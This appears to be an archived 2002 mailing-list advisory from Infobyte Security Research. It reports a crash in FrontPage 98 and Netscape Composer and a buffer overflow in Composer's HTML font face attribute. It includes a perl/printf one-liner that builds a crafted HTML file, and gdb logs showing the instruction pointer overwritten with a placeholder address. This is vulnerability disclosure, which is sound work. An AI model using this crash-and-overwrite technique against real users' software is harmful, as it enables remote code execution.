OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: S[h]iff - [ISR] - Infobyte Security Research (sh1ffciudad.com.ar)
Date: Thu Jun 13 2002 - 06:31:03 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ::: [ISR] :::
    ::: Infobyte Security Research :::
     :: www.infobyte.com.ar ::
             ::::::::::::::::::::::::::::::

    .::Software Affected:

     - Microsoft FrontPage 98
     - Composer, Netscape 4.77/U.S ..(< or > ??)..

    .::Type of Problem:

     - Design Error
     - Buffer Overflow

    .::Problem:

    * Design Error:
    ----------

    When a file in HTML is created that contains
    for example;

    ------------------------------
    <html>
    <body>

    <font face="">Hola!</font>

    </body>
    </html>
    ------------------------------

    The FrontPage and Composer crash,
    for a bad manipulation <font face="">
    (blank arguments).

    * Buffer Overflow :
    -----------------

    The Composer contains uncheck buffer
    in the label face, if you put a argument
    of >=191 bytes write part of memory

    for example;

    ------------------------------
    <html>
    <body>

    <font face="AAAAAAAAAAAA..[191]">Hola!</font>

    </body>
    </html>
    ------------------------------
    (A >= 191)

    --------
    [ gdb logs ]
    --------

    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

    Program received signal SIGSEGV, Segmentation fault.
    0x846e6bb in CEditElement::SetTagData () at eval.c:88
    (gdb) info all-registers
    eax 0x0 0
    ecx 0xffffffff -1
    edx 0x90a3be0 151665632
    ebx 0x90a3be0 151665632
    esp 0xbfffe0d4 0xbfffe0d4
    ebp 0xbfffe0e4 0xbfffe0e4
    esi 0x12147820 303331360
    edi 0x12147820 303331360
    eip 0x846e6bb 0x846e6bb
    eflags 0x10246 66118

    *But the program begin to write ret address memory, when
    A if = 197 byte, check this !

    # printf "<html>\n</body>\n<font face=\"`perl -e 'printf "A"x197'``perl -e
    'printf "\x78\x56\x34\x12"'`\"> Hola! </font>\n</body>\n</html>" >> source.htm

    source.htm created contains ;

    ---------------------------
    <html>
    <body>

    <font face="AAAAAAAAAAAA..[197][ret address 0x12345678]">Hola!</font>

    </body>
    </html>
    ---------------------------

     -------
    [ gdb logs ]
     -------

    # gdb netscape

    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'

     * "Here = does the program loaded the html file with AAA.. in the face args"

    Program received signal SIGSEGV, Segmentation fault.
    [[0x12345678]] in ?? () at eval.c:88

    (gdb) info all-registers
    eax 0x9003e22 151010850
    ecx 0x0 0
    edx 0x25c00900 633342208
    ebx 0x90a39a0 151665056
    esp 0xbfffe0c0 0xbfffe0c0
    [ebp 0x41414141 0x41414141]
    esi 0x90d6000 151871488
    edi 0xbfffe0ec -1073749780
    [eip 0x12345678 0x12345678]
    eflags 0x10246 66118

    I check this b0fs in Slackware 8.0, and the netscape isn't installed setuid
    root by default.
    I didn't check other distributions
    Sorry for my poor English.

    Salutes ``S[h]iff``
    [ISR] - Crew! Mal0r..